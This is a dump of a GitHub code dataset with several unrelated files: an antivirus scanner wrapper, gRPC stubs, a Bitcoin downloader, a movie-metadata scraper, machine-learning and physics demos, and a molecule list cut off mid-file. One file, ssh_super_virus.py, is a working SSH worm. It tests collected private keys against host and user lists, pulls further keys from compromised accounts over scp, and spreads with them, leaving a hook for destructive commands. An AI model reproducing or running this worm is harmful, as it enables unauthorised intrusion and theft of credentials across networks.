max_stars_repo_path (stringlengths 4-245) | max_stars_repo_name (stringlengths 7-115) | max_stars_count (int64 101-368k) | id (stringlengths 2-8) | content (stringlengths 6-1.03M) |
---|---|---|---|---|
probe/modules/antivirus/sophos/sophos.py | krisshol/bach-kmno | 248 | 12669401 | #
# Copyright (c) 2013-2018 Quarkslab.
# This file is part of IRMA project.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License in the top-level directory
# of this distribution and at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# No part of the project, including this file, may be copied,
# modified, propagated, or distributed except according to the
# terms contained in the LICENSE file.
import logging
import re
import os
from pathlib import Path
from modules.antivirus.base import AntivirusUnix
log = logging.getLogger(__name__)
class Sophos(AntivirusUnix):
name = "Sophos Anti-Virus (Linux)"
# ==================================
# Constructor and destructor stuff
# ==================================
def __init__(self, *args, **kwargs):
# class super class constructor
super().__init__(*args, **kwargs)
# scan tool variables
self.scan_args = (
"-archive", # scan inside archives
"-cab", # scan microsoft cab file
"-loopback", # scan loopback-type file
"-tnef", # scan tnet file
"-mime", # scan file encoded with mime format
"-oe", # scan microsoft outlook
"-pua", # scan file encoded with mime format
"-ss", # only print errors or found viruses
"-nc", # do not ask remove confirmation when infected
"-nb", # no bell sound
)
# NOTE: on windows, 0 can be returned even if the file is infected
self._scan_retcodes[self.ScanResult.INFECTED] = \
lambda x: x in [0, 1, 2, 3]
self.scan_patterns = [
re.compile(">>> Virus '(?P<name>.+)' found in file (?P<file>.+)",
re.IGNORECASE),
]
# ==========================================
# Antivirus methods (need to be overriden)
# ==========================================
def get_version(self):
"""return the version of the antivirus"""
return self._run_and_parse(
'--version',
            regexp=r'(?P<version>\d+(\.\d+)+)',
group='version')
def get_database(self):
"""return list of files in the database"""
        # NOTE: the database location could be queried from Sophos' own
        # configuration tool, but it is not always available. Instead,
        # hardcode some common paths and locate files using predefined patterns
search_paths = [
Path('/opt/sophos-av/lib/sav'), # default location in debian
]
database_patterns = [
'*.dat',
'vdl??.vdb',
'sus??.vdb',
'*.ide',
]
return self.locate(database_patterns, search_paths, syspath=False)
def get_scan_path(self):
"""return the full path of the scan tool"""
return self.locate_one("savscan", paths=[Path("/opt/sophos-av/bin")])
def scan(self, paths):
# quirk to force lang in linux
os.environ['LANG'] = "C"
return super().scan(paths)
def get_virus_database_version(self):
"""Return the Virus Database version"""
retcode, stdout, _ = self.run_cmd(self.scan_path, '-v')
if retcode:
raise RuntimeError(
"Bad return code while getting database version")
matches = re.search('Virus data version *: *(?P<version>.*)',
stdout,
re.IGNORECASE)
if not matches:
raise RuntimeError("Cannot read database version in stdout")
version = matches.group('version').strip()
        matches = re.search(r'Released *: *'
                            r'(?P<date>\d\d \w+ \d\d\d\d)',
stdout,
re.IGNORECASE)
if not matches:
return version
date = matches.group('date').strip()
return version + ' (' + date + ')'
|
crowd_anki/export/deck_exporter.py | ll-in-anki/CrowdAnki | 391 | 12669416 | from abc import abstractmethod, ABC
from pathlib import Path
from ..anki.adapters.anki_deck import AnkiDeck
class DeckExporter(ABC):
@abstractmethod
def export_to_directory(self, deck: AnkiDeck, output_dir: Path, copy_media=True) -> Path:
pass
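# Illustrative sketch (not part of CrowdAnki): a minimal concrete exporter showing
# how the abstract interface above is typically implemented. The file name and the
# serialization used here are hypothetical placeholders.
class PlainTextDeckExporter(DeckExporter):
    def export_to_directory(self, deck: AnkiDeck, output_dir: Path, copy_media=True) -> Path:
        output_dir.mkdir(parents=True, exist_ok=True)
        # Write a trivial text representation of the deck; a real exporter would
        # serialize notes, deck configuration and media references instead.
        (output_dir / "deck.txt").write_text(repr(deck))
        return output_dir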
|
hfc/protos/gossip/message_pb2_grpc.py | roviso/hyberledger-py | 389 | 12669428 | <filename>hfc/protos/gossip/message_pb2_grpc.py
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
from hfc.protos.gossip import message_pb2 as hfc_dot_protos_dot_gossip_dot_message__pb2
class GossipStub(object):
"""Gossip
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GossipStream = channel.stream_stream(
'/gossip.Gossip/GossipStream',
request_serializer=hfc_dot_protos_dot_gossip_dot_message__pb2.Envelope.SerializeToString,
response_deserializer=hfc_dot_protos_dot_gossip_dot_message__pb2.Envelope.FromString,
)
self.Ping = channel.unary_unary(
'/gossip.Gossip/Ping',
request_serializer=hfc_dot_protos_dot_gossip_dot_message__pb2.Empty.SerializeToString,
response_deserializer=hfc_dot_protos_dot_gossip_dot_message__pb2.Empty.FromString,
)
class GossipServicer(object):
"""Gossip
"""
def GossipStream(self, request_iterator, context):
"""GossipStream is the gRPC stream used for sending and receiving messages
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Ping(self, request, context):
"""Ping is used to probe a remote peer's aliveness
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_GossipServicer_to_server(servicer, server):
rpc_method_handlers = {
'GossipStream': grpc.stream_stream_rpc_method_handler(
servicer.GossipStream,
request_deserializer=hfc_dot_protos_dot_gossip_dot_message__pb2.Envelope.FromString,
response_serializer=hfc_dot_protos_dot_gossip_dot_message__pb2.Envelope.SerializeToString,
),
'Ping': grpc.unary_unary_rpc_method_handler(
servicer.Ping,
request_deserializer=hfc_dot_protos_dot_gossip_dot_message__pb2.Empty.FromString,
response_serializer=hfc_dot_protos_dot_gossip_dot_message__pb2.Empty.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'gossip.Gossip', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class Gossip(object):
"""Gossip
"""
@staticmethod
def GossipStream(request_iterator,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.stream_stream(request_iterator, target, '/gossip.Gossip/GossipStream',
hfc_dot_protos_dot_gossip_dot_message__pb2.Envelope.SerializeToString,
hfc_dot_protos_dot_gossip_dot_message__pb2.Envelope.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Ping(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/gossip.Gossip/Ping',
hfc_dot_protos_dot_gossip_dot_message__pb2.Empty.SerializeToString,
hfc_dot_protos_dot_gossip_dot_message__pb2.Empty.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
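# Illustrative usage sketch (not part of the generated code): a stub is created
# from an open channel and then used to call the service. The endpoint below is
# a hypothetical placeholder.
#
#     channel = grpc.insecure_channel('localhost:7051')
#     stub = GossipStub(channel)
#     stub.Ping(hfc_dot_protos_dot_gossip_dot_message__pb2.Empty())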
|
node_launcher/node_set/bitcoind/bitcoind_software.py | ryan-lingle/node-launcher | 249 | 12669576 | <reponame>ryan-lingle/node-launcher
from node_launcher.constants import (
IS_LINUX,
IS_MACOS,
IS_WINDOWS,
OPERATING_SYSTEM,
TARGET_BITCOIN_RELEASE
)
from node_launcher.node_set.lib.software import Software
class BitcoindSoftware(Software):
def __init__(self):
super().__init__(
software_name='bitcoind',
release_version=TARGET_BITCOIN_RELEASE
)
self.release_version = TARGET_BITCOIN_RELEASE.replace('v', '')
if IS_WINDOWS:
os_name = 'win64'
elif IS_MACOS:
os_name = 'osx64'
elif IS_LINUX:
os_name = 'x86_64-linux-gnu'
else:
raise Exception(f'{OPERATING_SYSTEM} is not supported')
self.download_name = f'bitcoin-{self.release_version}-{os_name}'
self.download_url = f'https://bitcoincore.org' \
f'/bin' \
f'/bitcoin-core-{self.release_version}' \
f'/{self.download_destination_file_name}'
@property
def daemon(self):
return self.bitcoind
@property
def cli(self):
return self.bitcoin_cli
@property
def bitcoin_qt(self) -> str:
return self.executable_path('bitcoin-qt')
@property
def bitcoin_cli(self) -> str:
return self.executable_path('bitcoin-cli')
@property
def bitcoind(self) -> str:
return self.executable_path('bitcoind')
@property
def uncompressed_directory_name(self) -> str:
if IS_LINUX:
name = '-'.join(self.download_name.split('-')[0:2])
else:
name = '-'.join(self.download_name.split('-')[:-1])
if name.count('.') == 3:
name = '.'.join(name.split('.')[:-1])
return name
|
addons/metadata.themoviedb.org.python/python/lib/tmdbscraper/tmdbapi.py | RetroFlix/retroflix.repo | 420 | 12669591 | # -*- coding: UTF-8 -*-
#
# Copyright (C) 2020, <NAME>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
# pylint: disable=missing-docstring
"""Functions to interact with TMDb API."""
from . import api_utils
import xbmc
try:
from typing import Optional, Text, Dict, List, Any # pylint: disable=unused-import
InfoType = Dict[Text, Any] # pylint: disable=invalid-name
except ImportError:
pass
HEADERS = (
('User-Agent', 'Kodi Movie scraper by Team Kodi'),
('Accept', 'application/json'),
)
api_utils.set_headers(dict(HEADERS))
TMDB_PARAMS = {'api_key': '<KEY>'}
BASE_URL = 'https://api.themoviedb.org/3/{}'
SEARCH_URL = BASE_URL.format('search/movie')
FIND_URL = BASE_URL.format('find/{}')
MOVIE_URL = BASE_URL.format('movie/{}')
COLLECTION_URL = BASE_URL.format('collection/{}')
CONFIG_URL = BASE_URL.format('configuration')
def search_movie(query, year=None, language=None):
# type: (Text) -> List[InfoType]
"""
Search for a movie
    :param query: movie title to search
:param year: the year to search (optional)
:param language: the language filter for TMDb (optional)
:return: a list with found movies
"""
xbmc.log('using title of %s to find movie' % query, xbmc.LOGDEBUG)
theurl = SEARCH_URL
params = _set_params(None, language)
params['query'] = query
if year is not None:
params['year'] = str(year)
return api_utils.load_info(theurl, params=params)
def find_movie_by_external_id(external_id, language=None):
# type: (Text) -> List[InfoType]
"""
Find movie based on external ID
    :param external_id: the external (IMDb) ID
:param language: the language filter for TMDb (optional)
:return: the movie or error
"""
xbmc.log('using external id of %s to find movie' % external_id, xbmc.LOGDEBUG)
theurl = FIND_URL.format(external_id)
params = _set_params(None, language)
params['external_source'] = 'imdb_id'
return api_utils.load_info(theurl, params=params)
def get_movie(mid, language=None, append_to_response=None):
# type: (Text) -> List[InfoType]
"""
Get movie details
:param mid: TMDb movie ID
:param language: the language filter for TMDb (optional)
    :param append_to_response: the additional data to get from TMDb (optional)
:return: the movie or error
"""
xbmc.log('using movie id of %s to get movie details' % mid, xbmc.LOGDEBUG)
theurl = MOVIE_URL.format(mid)
return api_utils.load_info(theurl, params=_set_params(append_to_response, language))
def get_collection(collection_id, language=None, append_to_response=None):
# type: (Text) -> List[InfoType]
"""
Get movie collection information
:param collection_id: TMDb collection ID
:param language: the language filter for TMDb (optional)
    :param append_to_response: the additional data to get from TMDb (optional)
:return: the movie or error
"""
xbmc.log('using collection id of %s to get collection details' % collection_id, xbmc.LOGDEBUG)
theurl = COLLECTION_URL.format(collection_id)
return api_utils.load_info(theurl, params=_set_params(append_to_response, language))
def get_configuration():
# type: (Text) -> List[InfoType]
"""
Get configuration information
:return: configuration details or error
"""
xbmc.log('getting configuration details', xbmc.LOGDEBUG)
return api_utils.load_info(CONFIG_URL, params=TMDB_PARAMS.copy())
def _set_params(append_to_response, language):
params = TMDB_PARAMS.copy()
img_lang = 'en,null'
if language is not None:
params['language'] = language
img_lang = '%s,en,null' % language[0:2]
if append_to_response is not None:
params['append_to_response'] = append_to_response
if 'images' in append_to_response:
params['include_image_language'] = img_lang
return params
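# Illustrative usage sketch (comments only, since this module expects to run inside
# Kodi with a real TMDb API key configured in TMDB_PARAMS above, and assuming
# api_utils.load_info returns the parsed TMDb JSON):
#
#     found = search_movie('Inception', year=2010, language='en-US')
#     movie = get_movie(found['results'][0]['id'], language='en-US',
#                       append_to_response='credits,images')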
|
packages/pyright-internal/src/tests/samples/lambda5.py | Jasha10/pyright | 3,934 | 12669614 | <gh_stars>1000+
# This sample tests the case where a lambda's type is determined using
# bidirectional type inference and one or more of the parameters
# corresponds to a generic type.
from typing import Callable, TypeVar, Generic, Any
T = TypeVar("T")
MsgT = TypeVar("MsgT", bound="Msg[Any]")
class Msg(Generic[T]):
body: T
class Request:
...
def check(func: "Callable[[MsgT, int], object]") -> MsgT:
...
notification: Msg[Request] = check(lambda msg, foo: (msg.body, foo))
|
qtrader/agents/persistence.py | aaron8tang/qtrader | 381 | 12669628 | <reponame>aaron8tang/qtrader<gh_stars>100-1000
import numpy as np
import pandas as pd
from qtrader.agents.base import Agent
from qtrader.utils.numpy import softmax
class PersistenceAgent(Agent):
"""Model-based **persistence** agent,
acting based on last observation
    (i.e. returns at t-1),
    using the softmax function."""
_id = 'persistence'
def __init__(self):
pass
def act(self, observation):
_returns = observation['returns']
if _returns.isnull().any():
# random sample
_values = pd.Series(np.random.uniform(0, 1, len(_returns)),
index=_returns.index,
name=_returns.name)
else:
# one step look back
_values = _returns
return softmax(_values)
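# Illustrative usage sketch (comments only; the observation format is assumed to be
# a dict holding a pandas Series of the previous period's returns, as read by act()
# above, and the tickers are hypothetical):
#
#     last_returns = pd.Series([0.01, -0.02, 0.005],
#                              index=['AAA', 'BBB', 'CCC'], name='returns')
#     weights = PersistenceAgent().act({'returns': last_returns})
#     # -> softmax of the last returns; the weights are positive and sum to 1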
|
src/purerpc/anyio_monkeypatch.py | decentral1se/purerpc | 143 | 12669641 | <gh_stars>100-1000
import os
import anyio
import logging
from anyio import run as _anyio_run
log = logging.getLogger(__name__)
def _new_run(func, *args, backend=None, backend_options=None):
if backend is None:
backend = os.getenv("PURERPC_BACKEND", "asyncio")
log.info("Selected {} backend".format(backend))
if backend == "uvloop":
import uvloop
uvloop.install()
backend = "asyncio"
return _anyio_run(func, *args, backend=backend, backend_options=backend_options)
def apply_monkeypatch():
"""Apply AnyIO monkeypatches (should merge upstream)"""
anyio.run = _new_run
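# Illustrative usage sketch: after apply_monkeypatch(), anyio.run() picks its
# backend from the PURERPC_BACKEND environment variable ("asyncio" by default;
# "uvloop" installs uvloop and then runs on asyncio).
if __name__ == "__main__":
    async def main():
        print("running on the backend selected via PURERPC_BACKEND")
    apply_monkeypatch()
    anyio.run(main)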
|
src/clusto/drivers/locations/zones/basiczone.py | thekad/clusto | 216 | 12669678 | from clusto.drivers.base import Location
class BasicZone(Location):
"""
Basic zone driver.
"""
_clusto_type = "zone"
_driver_name = "basiczone"
|
examples/python-guide/Grabit_demo.py | fabsig/GPBoost | 310 | 12669710 | <filename>examples/python-guide/Grabit_demo.py
# -*- coding: utf-8 -*-
"""
Examples on how to use GPBoost for the Grabit model of Sigrist and Hirnschall (2019)
@author: <NAME>
"""
import sklearn.datasets as datasets
import numpy as np
import gpboost as gpb
"""
Example 1
"""
# simulate data
np.random.seed(1)
n = 10000
X, lp = datasets.make_friedman3(n_samples=n)
X_test, lp_test = datasets.make_friedman3(n_samples=n)
lp = lp*5+0.2
lp_test = lp_test*5+0.2
y = np.random.normal(loc=lp,scale=1)
y_test = np.random.normal(loc=lp_test,scale=1)
# apply censoring
yu = 8
yl = 5
y[y>=yu] = yu
y[y<=yl] = yl
# censoring fractions
print(np.sum(y==yu) / n)
print(np.sum(y==yl) / n)
# train model and make predictions
params = {'objective': 'tobit', 'verbose': 0, 'yl': yl, 'yu': yu}
dtrain = gpb.Dataset(X, y)
bst = gpb.train(params=params, train_set=dtrain, num_boost_round=100)
y_pred = bst.predict(X_test)
# mean square error (approx. 1.1 for n=10'000)
print("Test error of Grabit: " + str(((y_pred-y_test)**2).mean()))
# compare to standard least squares gradient boosting (approx. 1.8 for n=10'000)
params = {'objective': 'regression_l2', 'verbose': 0}
bst = gpb.train(params=params, train_set=dtrain, num_boost_round=100)
y_pred_ls = bst.predict(X_test)
print("Test error of standard least squares gradient boosting: " + str(((y_pred_ls-y_test)**2).mean()))
# measure time
import time
params = {'objective': 'tobit', 'verbose': 0, 'yl': yl, 'yu': yu}
dtrain = gpb.Dataset(X, y)
start = time.time()
bst = gpb.train(params=params, train_set=dtrain, num_boost_round=100)
end = time.time()
print(end - start)
# approx. 0.1 sec for n=10'000 on a standard laptop
"""
Example 2: 2-d non-linear function
"""
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
def nonlin_fct(x1,x2):
r=x1**2+x2**2
r=np.pi*2*1*(r**0.75)
f=2*np.cos(r)
return(f)
def plot_2d_fct(x1,x2,y,title="2d function",elev=45,azim=120,zlim=None,filename=None):
fig = plt.figure(figsize=(8, 7))
ax = Axes3D(fig)
if zlim is not None:
ax.set_zlim3d(zlim)
surf = ax.plot_surface(x1, x2, y, rstride=1, cstride=1,
cmap=plt.cm.BuPu, edgecolor='k',vmax=zlim[1])
else:
surf = ax.plot_surface(x1, x2, y, rstride=1, cstride=1,
cmap=plt.cm.BuPu, edgecolor='k')
ax.set_xlabel("X1")
ax.set_ylabel("X2")
ax.set_zlabel('')
# pretty init view
ax.view_init(elev=elev, azim=azim)
plt.colorbar(surf)
plt.suptitle(title)
plt.subplots_adjust(top=0.9)
if filename is None:
plt.show()
else:
plt.savefig(filename,dpi=200)
## True function
nx = 100
x = np.arange(-1+1/nx,1,2/nx)
x1, x2 = np.meshgrid(x, x)
yt = nonlin_fct(x1,x2)
zlim = (-1.75,1.75)
plot_2d_fct(x1,x2,yt,title="True F",zlim=zlim)
# simulate data
n = 10000
np.random.seed(10)
X = np.random.rand(n,2)
X = (X-0.5)*2
y = nonlin_fct(X[:,0],X[:,1])+np.random.normal(scale=1, size=n)
# apply censoring
yc = y.copy()
yl = np.percentile(y,q=33.33)
yu = np.percentile(y,q=66.66)
yc[y>=yu] = yu
yc[y<=yl] = yl
# train Grabit model and make predictions
params = {'objective': 'tobit', 'verbose': 0, 'yl': yl, 'yu': yu, 'sigma': 1.,
'learning_rate': 0.1, 'max_depth': 3}
dtrain = gpb.Dataset(X, yc)
bst = gpb.train(params=params, train_set=dtrain, num_boost_round=100)
X_pred = np.transpose(np.array([x1.flatten(),x2.flatten()]))
y_pred = bst.predict(X_pred)
plot_2d_fct(x1,x2,y_pred.reshape((100,-1)),title="Grabit",zlim=zlim)
# compare to standard least squares gradient boosting
params = {'objective': 'regression_l2', 'verbose': 0, 'yl': yl, 'yu': yu, 'sigma': 1.,
'learning_rate': 0.1, 'max_depth': 3}
dtrain = gpb.Dataset(X, yc)
bst = gpb.train(params=params, train_set=dtrain, num_boost_round=100)
X_pred = np.transpose(np.array([x1.flatten(),x2.flatten()]))
y_pred = bst.predict(X_pred)
plot_2d_fct(x1,x2,y_pred.reshape((100,-1)),title="L2 Boosting",zlim=zlim)
|
ssh_super_virus.py | HiMiC/scripts-averagesecurityguy | 877 | 12669715 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2013, AverageSecurityGuy
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# Neither the name of AverageSecurityGuy nor the names of its contributors may
# be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
# NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA,
# OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY
# OF SUCH DAMAGE.
import os
import re
re_login = re.compile(r'Please login as the user "(.*)" rather than')
def run_ssh_command(user, key, host, command):
'''
Run the specified command on the host.
'''
cmd = 'ssh -i {0} {1}@{2} "{3}"'.format(key, user, host, command)
output = os.popen4(cmd)
resp = output[1].read()
# Check for common errors and return None
if resp.find('Permission denied') > -1:
return None
# If no errors then return output of command
return resp
def do_something_evil(user, key, host):
'''
For penetration testers, this is called post exploitation and the list of
commands that are run would yield data used for exploiting other machines
on the network or for exfiltration. For Shaun and Tatu, this is where the
SSH super virus does its dirty work :). It is left up to the user to add
the appropriate commands to "steal, distort or destroy confidential data."
'''
evil_commands = []
for cmd in evil_commands:
resp = run_ssh_command(user, key, host, cmd)
if resp is not None:
print resp
def download_new_key(user, key, host, file):
'''Use SCP to copy new key files from the remote server.'''
print '[*] Attempting to download key {0}'.format(file)
src = '{0}@{1}:.ssh/{2}'.format(user, host, file)
dst = '{0}-{1}_{2}'.format(user, host, file)
cmd = 'scp -i {0} {1} {2}'.format(key, src, dst)
output = os.popen4(cmd)
resp = output[1].read()
# Check for common errors and return None
if resp.find('not a regular file') > -1:
        print '[-] Unable to download key file {0}\n'.format(dst)
        return
# If no errors then key file was downloaded
print '[+] New key file {0} downloaded.\n'.format(dst)
if dst not in new_keys:
new_keys.append(dst)
def login_with_key(user, key, host):
'''
Attempt to login to the SSH server at host with the user and key.
'''
print '[*] Attempting login to {0} with user {1} and key {2}'.format(host,
user, key)
resp = run_ssh_command(user, key, host, 'ls .ssh')
if resp is None:
print '[-] Login to {0}@{1} with key {2} failed\n'.format(user,
host, key)
else:
m = re_login.search(resp)
if m is not None:
# Received a message stating we need to login as a different user.
print '[-] Login to {0}@{1} with key {2} failed\n'.format(user,
host, key)
else:
print '[+] Login to {0}@{1} with key {2} succeeded'.format(user,
host, key)
for line in resp.split('\n'):
if line == 'authorized_keys':
continue
if line == 'known_hosts':
continue
if line == 'config':
continue
if line == '':
continue
download_new_key(user, key, host, line)
do_something_evil(user, key, host)
def load_keys():
'''
Load the initial set of SSH keys from the current directory. Prefix the
key filename with "username-" to use the specified username otherwise root
will be used. I assume the username will start with [a-z] and contain only
[a-z0-9_], if that is not the case, modify the regex at the top of the
script. Files with the extension ".pub" will be ignored.
'''
keys = []
print '[*] Loading SSH keys from current directory.'
for file in os.listdir('.'):
if file.endswith('.pub'):
continue
if file == 'users':
continue
if file == 'hosts':
continue
if file == os.path.basename(__file__):
continue
keys.append(file)
return keys
def load_users():
'''
Load user accounts from a file called 'users' in the current directory.
'''
u = []
print '[*] Loading user accounts.'
for line in open('users', 'r'):
if line == '\n':
continue
u.append(line.rstrip())
return u
def load_hosts():
'''
Load hostnames/ips from a file called 'hosts' in the current directory.
'''
h = []
print '[*] Loading hosts.'
for line in open('hosts', 'r'):
if line == '\n':
continue
h.append(line.rstrip())
return h
if __name__ == '__main__':
users = load_users()
hosts = load_hosts()
initial_keys = load_keys()
new_keys = []
print '[*] Testing loaded keys.'
for key in initial_keys:
for host in hosts:
for user in users:
login_with_key(user, key, host)
print '[*] Testing discovered keys'
while new_keys != []:
key = new_keys.pop(0)
for host in hosts:
for user in users:
login_with_key(user, key, host)
|
Python/ToLowerCaseTest.py | TonnyL/Windary | 205 | 12669735 | <gh_stars>100-1000
from unittest import TestCase
from ToLowerCase import ToLowerCase
class ToLowerCaseTest(TestCase):
def test_toLowerCase(self):
tlc = ToLowerCase()
self.assertEqual(tlc.toLowerCase("Hello"), "hello")
self.assertEqual(tlc.toLowerCase("here"), "here")
self.assertEqual(tlc.toLowerCase("LOVELY"), "lovely")
|
spk_id/make_fefeats_cfg.py | ishine/pase | 428 | 12669737 | <gh_stars>100-1000
import json
import glob
import os
DATA_PATH = '../fefeats/bsz16/epoch0'
epoch = list(range(0, 13))
splits = ['train', 'test', 'valid']
MAX_WAVS_SPK = {'train':100,
'test':10,
'valid':10}
spk2count = {}
cfg = {}
splits = ['train', 'test', 'valid']
spk2split = {}
spk2idx = {}
dataset = glob.glob('{}/all/*.npy'.format(DATA_PATH))
for filename in dataset:
fname = os.path.basename(filename)
bname = os.path.splitext(fname)[0]
spk_id = bname.split('_')[0]
if spk_id not in spk2count:
spk2count[spk_id] = {'train':0,
'test':0,
'valid':0}
spk2split[spk_id] = 0
spk2idx[spk_id] = len(spk2idx)
curr_split = spk2split[spk_id]
curr_samples = spk2count[spk_id][splits[curr_split]]
if curr_samples >= MAX_WAVS_SPK[splits[curr_split]]:
if curr_split >= len(splits) - 1:
continue
spk2split[spk_id] += 1
else:
if splits[curr_split] not in cfg:
cfg[splits[curr_split]] = {'wav_files':[],
'spk_ids':[]}
cfg[splits[curr_split]]['wav_files'].append(fname)
cfg[splits[curr_split]]['spk_ids'].append(spk_id)
spk2count[spk_id][splits[curr_split]] += 1
cfg['spk2idx'] = spk2idx
with open('bsz16_fefeats_data.cfg', 'w') as cfg_f:
cfg_f.write(json.dumps(cfg, indent=2))
|
website/meta/macros.py | sophieball/Cornell-Conversational-Analysis-Toolkit | 371 | 12669743 | # macro("example", lambda ctx: fetch(ctx, "site.title"))
|
doc/Programs/LecturePrograms/programs/RandomWalks/python/program4.py | kimrojas/ComputationalPhysicsMSU | 220 | 12669756 | # coding=utf-8
#
# 1D-randomwalk: A walker makes several steps,
# with a given number of walks per trial.
# Similar to program1, but this version also computes
# the probability of a gridpoint being "touched"
#
#Translated to Python by <NAME>
import numpy, sys, math
def mc_trial(number_walks,move_probability,walk_cum,walk2_cum, probability):
"""
Do a MonteCarlo trial, that is,
random-walk one particle.
Input:
- number_walks: Number of steps to walk the particle
- move_probability: Probability that the particle
will step right when doing a step
- walk_cum: Numpy-array of length number_walks + 1,
containing the sum of the position
of the particles as a function of time
                 (useful to calculate mean pos. as a function
of time)
- walk2_cum: Same as walk_cum, but with the sum of the
positions squared
- probability: Number of times each gridpoint is hit
Output: As walk_cum, walk2_cum, and probability are (pointers to)
numpy arrays, they are altered also in the calling function.
"""
#Initial pos. As walk_cum[0]=walk2_cum[0] = 0.0
    #by initialization, it is unnecessary to add this step to
#the arrays...
pos = 0;
for walk in xrange(number_walks+1):
if numpy.random.random() <= move_probability:
pos += 1
else:
pos -= 1
walk_cum[walk] += pos
walk2_cum[walk] += pos**2
#Zero-position of the array is the leftmost
#end of the grid
probability[pos+number_walks] += 1
def mc_sample(length,trials, number_walks, move_probability):
"""
Generate the probability distribution for finding
a walker at a gridpoint, after a number of walks on a
1d lattice with wrap-around boundary conditions
(\"pacman universe\")
Input:
- length: Lattice-points away from x=0
- trials: Number of MonteCarlo trials (number of walkers)
- move_probability: Probability of moving right
Output:
Normalized probability of finding a walker on a
specific grid position
"""
#Grid position of every walker
x = numpy.zeros(trials,numpy.int)
#Loop over timesteps and walkers,
#and find the walkers "ending positions"
for t in xrange(number_walks):
for i in xrange(trials):
if numpy.random.random() <= move_probability:
x[i] += 1
#Wraparound?
if x[i] > length:
x[i] = -length
else:
x[i] -= 1
if x[i] < -length:
x[i] = +length
#Calculate the probability of finding a walker
    #at each grid-position
probability = numpy.zeros(2*length+1)
for i in xrange(len(probability)):
pos = i-length
#count number of occurences of this pos i x array
count = 0
for j in xrange(len(x)):
if x[j] == pos:
count += 1
#Normalize and save
probability[i] = count/float(trials)
return probability
#Main program
#Get data from command-line arguments
if len(sys.argv) == 5:
length = int(sys.argv[1])
trials = int(sys.argv[2])
number_walks = int(sys.argv[3])
move_probability = float(sys.argv[4])
else:
print "Usage: python", sys.argv[0],\
"lenght trials number_walks move_probability"
sys.exit(0)
#Do the MC
probability = mc_sample(length,trials,number_walks,move_probability);
#Not reliable: ln(0)
#entropy = - numpy.sum(probability*numpy.log(probability))
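# Shannon entropy of the walker distribution: S = -sum_i p_i * ln(p_i),
# where bins with p_i = 0 are skipped (they contribute 0 in the limit)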
entropy = 0.0
for i in xrange(len(probability)):
if probability[i] > 0.0:
entropy -= probability[i]*math.log(probability[i])
print "Timesteps =",number_walks
print "Walkers (num. trials) =",trials
print "Entropy =",entropy
print
if len(probability) <= 101:
print "Probability distribution (Flat => high entropy):"
print probability
else:
print "Probability distribution to big to print"
|
pyxtal/miscellaneous/mol.py | ubikpt/PyXtal | 127 | 12669775 | <reponame>ubikpt/PyXtal<gh_stars>100-1000
from rdkit import Chem
from rdkit.Chem import AllChem
import pymatgen as mg
from glob import glob
data = {}
data["HAHCOI"] = "s1c2ccc3scc4ccc(c1)c2c34"
data["JAPWIH"] = "s1ccc2cc3sc4cc5ccsc5cc4c3cc12"
data["WEXBOS"] = "s1c(c2ccccc2)c(c2ccccc2)c2c1c(c(s2)c1ccccc1)c1ccccc1"
data["LAGNAL"] = "s1c(/C=N/[C@H](C)c2ccc(F)cc2)ccc1/C=N/[C@H](C)c1ccc(F)cc1"
data["YICMOP"] = "s1cccc1c1c(F)c(OC)c(c2sccc2)c(F)c1OC"
data["MERQIM"] = "s1c2c(c3c1SCCC3)cc1sc3SCCCc3c1c2"
